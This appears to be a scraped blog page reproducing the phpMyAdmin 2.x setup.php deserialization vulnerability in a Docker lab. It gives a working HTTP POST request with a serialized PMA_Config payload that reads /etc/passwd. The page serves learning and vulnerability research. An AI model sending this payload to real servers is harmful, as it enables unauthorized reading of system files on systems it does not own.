zoukankan      html  css  js  c++  java
  • WooYun-2016-199433 反序列化漏洞复现

    Phpmyadmin Scripts/setup.php Deserialization Vulnerability (WooYun-2016-199433)

    中文版本(Chinese version)

    Affected version: 2.x

    Setup

    Run the following command to start phpmyadmin:

    docker-compose up -d

    Visit http://your-ip:8080 and you will see the phpmyadmin home page. Because there is no connection to the database, we will get an error. But this vulnerability is not related to the database, so just ignore.

    Exploit

    Send the following package to read /etc/passwd:

    POST /scripts/setup.php HTTP/1.1
    Host: your-ip:8080
    Accept-Encoding: gzip, deflate
    Accept: */*
    Accept-Language: en
    User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)
    Connection: close
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 80
    
    action=test&configuration=O:10:"PMA_Config":1:{s:6:"source",s:11:"/etc/passwd";}

    操作方法:

  • 相关阅读:
    数据的安装及常识
    数据库基础
    zabbix入门
    zabbix安装报错
    https
    rewrite
    keepalived
    计算机键盘在编辑情况下键盘不见,仅能输入字母
    集成学习
    js
  • 原文地址:https://www.cnblogs.com/bonelee/p/14732351.html
Copyright © 2011-2022 走看看